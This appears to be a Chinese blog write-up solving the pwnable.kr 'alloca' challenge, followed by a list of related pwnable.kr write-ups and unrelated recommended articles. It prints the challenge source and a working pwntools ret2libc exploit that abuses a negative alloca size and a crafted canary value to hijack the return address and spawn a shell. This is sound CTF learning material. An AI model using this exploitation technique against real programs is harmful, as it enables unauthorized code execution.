0x00:

好久没玩了...去年十月以后就没玩过了TAT 这几天把peach的坑,winafl的坑填了下,就来搞下pwn。

0x01:

这个程序是给了源码的

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

void clear_newlines(){

    int c;

    do{

        c = getchar();

    }while (c != '\n' && c != EOF);

}

int g_canary;

int check_canary(int canary){

    int result = canary ^ g_canary;

    int canary_after = canary;

    int canary_before = g_canary;

    printf("canary before using buffer : %d\n", canary_before);

    printf("canary after using buffer : %d\n\n", canary_after);

    if(result != 0){

        printf("what the f...??? how did you fucked this buffer????\n");

    }

    else{

        printf("I told you so. its trivially easy to prevent BOF :)\n");

        printf("therefore as you can see, it is easy to make secure software\n");

    }

    return result;

}

int size;

char* buffer;

int main(){

    printf("- BOF(buffer overflow) is very easy to prevent. here is how to.\n\n");

    sleep(2);

    printf("   1. allocate the buffer size only as you need it\n");

    printf("   2. know your buffer size and limit the input length\n\n");

    printf("- simple right?. let me show you.\n\n");

    sleep(2);

    printf("- whats the maximum length of your buffer?(byte) : ");

    scanf("%d", &size);

    clear_newlines();

        printf("- give me your random canary number to prove there is no BOF : ");

        scanf("%d", &g_canary);

        clear_newlines();

    printf("- ok lets allocate a buffer of length %d\n\n", size);

    sleep(1);

    buffer = alloca( size + 4 );    // 4 is for canary

    printf("- now, lets put canary at the end of the buffer and get your data\n");

    printf("- don't worry! fgets() securely limits your input after %d bytes :)\n", size);

    printf("- if canary is not changed, we can prove there is no BOF :)\n");

    printf("$ ");

    memcpy(buffer+size, &g_canary, 4);    // canary will detect overflow.

    fgets(buffer, size, stdin);        // there is no way you can exploit this.

    printf("\n");

    printf("- now lets check canary to see if there was overflow\n\n");

    check_canary( *((int*)(buffer+size)) );

    return 0;

}

主要还是需要突破他的防护,拿到shell。

看下bin文件开了什么保护:

调试发现,check_canary()函数返回的时候,如果恰当的设置g_canary的值,就可以控制返回地值。



然后我就卡在这里了...开启了NX,只能ROP的思路搞,但是ROP链又不知道哪里放置。

0x02:

后来参考了别人的做法,才发现这是个本地利用...直接按照以前玩overthewire学来的套路就可以:sc放在环境变量离,然后确定地址,直接改返回地值过去就可以了。

不过首先要利用ulimit -s unlimited去固定下libc的加载地址,然后才可以确定system()和/bin/sh地址。

附上我本地调试的时候的exp,环境不同,所以地址可能不同。

from pwn import *

import os

off_system  = 0x0003d3e0    # objdump -d /lib/i386-linux-gnu/libc.so.6 | grep system

off_shell   = 0x0015ea69    # grep -oba /bin/sh /lib/i386-linux-gnu/libc.so.6

adr_libc    = 0x40047000    # ldd alloca

adr_payload = 0x40025857    # searchmem "AAAA"

payload     =   p32(adr_libc + off_system)

payload     +=  p32(0xdeadbeef)

payload     +=  p32(adr_libc + off_shell)

#test = "AAAABBBBCCCC"

#p = process('./alloca', env = {'LD_PRELOAD': test})

p = process('./alloca', env = {'LD_PRELOAD': payload})

#raw_input("$$")

p.sendline(str(-92))

p.sendline(str((adr_payload + 4) ^ 0x08048250))

p.interactive()

'''

0x40025857 ^ 0x08048250 --> 0x4806da07

Cannot access memory at address 0x4806da03

0x40025857 + 4

'''

0x03:参考链接

http://0byjwzsf.me/2016/08/08/pwnable-rookiss-alloca/#more

[pwnable.kr]--alloca的更多相关文章

  1. pwnable.kr的passcode

    前段时间找到一个练习pwn的网站,pwnable.kr 这里记录其中的passcode的做题过程,给自己加深印象. 废话不多说了,看一下题目, 看到题目,就ssh连接进去,就看到三个文件如下 看了一下 ...

  2. pwnable.kr bof之write up

    这一题与前两题不同,用到了静态调试工具ida 首先题中给出了源码: #include <stdio.h> #include <string.h> #include <st ...

  3. pwnable.kr col之write up

    Daddy told me about cool MD5 hash collision today. I wanna do something like that too! ssh col@pwnab ...

  4. pwnable.kr brainfuck之write up

    I made a simple brain-fuck language emulation program written in C. The [ ] commands are not impleme ...

  5. pwnable.kr login之write up

    main函数如下: auth函数如下: 程序的流程如下: 输入Authenticate值,并base64解码,将解码的值代入md5_auth函数中 mad5_auth()生成其MD5值并与f87cd6 ...

  6. pwnable.kr详细通关秘籍(二)

    i春秋作家:W1ngs 原文来自:pwnable.kr详细通关秘籍(二) 0x00 input 首先看一下代码: 可以看到程序总共有五步,全部都满足了才可以得到flag,那我们就一步一步来看 这道题考 ...

  7. pwnable.kr simple login writeup

    这道题是pwnable.kr Rookiss部分的simple login,需要我们去覆盖程序的ebp,eip,esp去改变程序的执行流程   主要逻辑是输入一个字符串,base64解码后看是否与题目 ...

  8. pwnable.kr第二天

    3.bof 这题就是简单的数组越界覆盖,直接用gdb 调试出偏移就ok from pwn import * context.log_level='debug' payload='A'*52+p32(0 ...

  9. [pwnable.kr]Dragon

    0x00: dragon 是一个UAF漏洞的利用. UseAfterFree 是堆的漏洞利用的一种 简单介绍 https://www.owasp.org/index.php/Using_freed_m ...

随机推荐

  1. package[golang]学习笔记之context

    *关于context https://talks.golang.org/2014/gotham-context.slide#29

  2. 美团2017年CodeM大赛-初赛A轮 C合并回文子串

    区间dp一直写的是递归版本的, 竟然超时了, 学了一下非递归的写法. #include <iostream> #include <sstream> #include <a ...

  3. 手把手教你搭建FastDFS集群(下)

    手把手教你搭建FastDFS集群(下) 版权声明:本文为博主原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明. 本文链接:https://blog.csdn.net/u0 ...

  4. js之数据类型(对象类型——构造器对象——对象)

    JavaScript中除了原始类型,null,undefined之外就是对象了,对象是属性的集合,每个属性都是由键值对(值可以是原始值,比如说是数字,字符串,也可以是对象)构成的.对象又可分为构造器对 ...

  5. Unexpected console statement (no-console)

    在vue cli项目中用consloe.log()打印,启动项目报错 export default { name: 'app', components: { }, created() { this.t ...

  6. Git切换分支并提交到远程分支

    1. 在本地需要提交的文件同级目录运行git bash 2. 初始化 git 运行环境 $ git init 3. 新建本地分支develop $ git checkout -b decelop 4. ...

  7. 基于Dockerfile搭建JAVA Tomcat运行环境

    前言 在第一篇文字中,我们完全人工方式,一个命令一个命令输入,实现一个java tomcat运行环境,虽然也初见成效,但很累人.如果依靠依靠脚本构建一个Tomcat容器实例,一个命令可以搞定,何乐而不 ...

  8. Phoenix批量提交优化,官网的demo

    1 Phoenix的批量insert官网代码,最佳实践 try (Connection conn = DriverManager.getConnection(url)) { conn.setAutoC ...

  9. centos 7 安装 LNMPC cacti 1.2.7 监控

    先上图,后续更新

  10. Python制作的射击游戏

    如果其他朋友也有不错的原创或译文,可以尝试推荐给伯乐在线.] 你有没有想过电脑游戏是怎样制作出来的?其实它没有你想象的那样复杂! 在这个教程里,你要学做一个叫<兔子和獾>的塔防游戏,兔子作 ...